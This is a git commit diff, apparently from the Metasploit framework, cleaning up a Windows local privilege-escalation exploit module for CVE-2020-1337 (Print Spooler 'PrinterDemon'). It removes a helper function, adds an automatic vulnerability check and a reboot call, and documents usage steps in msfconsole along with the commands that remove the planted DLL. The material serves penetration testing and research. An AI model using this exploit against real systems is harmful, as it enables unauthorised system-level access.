Cleanup and edits per review from Christophe
Removed unused method from ps script Cleaned up some code in the module Added removal instructions to the documentation
This commit is contained in:
parent
7d81b4826d
commit
50e115b414
|
@ -74,31 +74,6 @@ $MethodDefinition = @"
|
|||
}
|
||||
return bSuccess;
|
||||
}
|
||||
public static bool SendFileToPrinter(string szPrinterName, string szFileName)
|
||||
{
|
||||
// Open the file.
|
||||
FileStream fs = new FileStream(szFileName, FileMode.Open);
|
||||
// Create a BinaryReader on the file.
|
||||
BinaryReader br = new BinaryReader(fs);
|
||||
// Dim an array of bytes big enough to hold the file's contents.
|
||||
Byte[] bytes = new Byte[fs.Length];
|
||||
bool bSuccess = false;
|
||||
// Your unmanaged pointer.
|
||||
IntPtr pUnmanagedBytes = new IntPtr(0);
|
||||
int nLength;
|
||||
nLength = Convert.ToInt32(fs.Length);
|
||||
// Read the contents of the file into the array.
|
||||
bytes = br.ReadBytes(nLength);
|
||||
// Allocate some unmanaged memory for those bytes.
|
||||
pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
|
||||
// Copy the managed byte array into the unmanaged array.
|
||||
Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
|
||||
// Send the unmanaged bytes to the printer.
|
||||
bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
|
||||
// Free the unmanaged memory that you allocated earlier.
|
||||
Marshal.FreeCoTaskMem(pUnmanagedBytes);
|
||||
return bSuccess;
|
||||
}
|
||||
}
|
||||
}
|
||||
"@;
|
||||
|
|
|
@ -20,24 +20,31 @@ but the link will be in place when the print takes place, so the file
|
|||
write will pass through and end up in the trusted location.
|
||||
|
||||
When the printer is created, the target will show a pop-up saying a
|
||||
printer weas created.
|
||||
printer was created.
|
||||
A larger issue here is that the Spooler service does not like to stop.
|
||||
Trying `sc stop` Spooler does not stop the spooler.
|
||||
Killing the pid with a trusted process will kill it, but it restarts
|
||||
automatically.
|
||||
Using the `pendingFileRenameOperations` registry key also does not appear
|
||||
to work.
|
||||
To remove the dll, you can:
|
||||
`sc config spooler start= disabled`
|
||||
`taskkill /F /IM spoolsv.exe`
|
||||
`del ualapi.dll`
|
||||
`sc config spooler start= auto`
|
||||
`sc start spooler`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Start ```msfconsole```
|
||||
get session on a windows target that is not patched (and <= 2003)
|
||||
get session on a windows target that is not patched (and <= windows 10 version 2004)
|
||||
```use windows/local/cve_2020_1337_printerdemon```
|
||||
```set session <session>```
|
||||
```set payload <payload>```
|
||||
```set lhost <lhost>```
|
||||
```set lport <lport>```
|
||||
```run```
|
||||
|
||||
Reboot twice
|
||||
Verify you get a session
|
||||
|
||||
|
|
|
@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::Powershell
|
||||
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
|
@ -92,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Run Exploit Script
|
||||
print_status("Running Exploit on #{sysinfo['Computer']}")
|
||||
vprint_status(script)
|
||||
begin
|
||||
#client.powershell.execute_string(code: script)
|
||||
session.powershell.execute_string({code: script})
|
||||
|
@ -138,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Rebooting #{sysinfo['Computer']}")
|
||||
reboot_command = 'shutdown /r'
|
||||
begin
|
||||
cmd_exec('cmd.exe', "/c #{reboot_command}")
|
||||
session.sys.power.reboot
|
||||
rescue Rex::TimeoutError => e
|
||||
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
|
||||
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
|
||||
|
@ -168,20 +169,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
vprint_status("Build Number = #{build_num}")
|
||||
return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
return unless file?(path)
|
||||
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog(e)
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue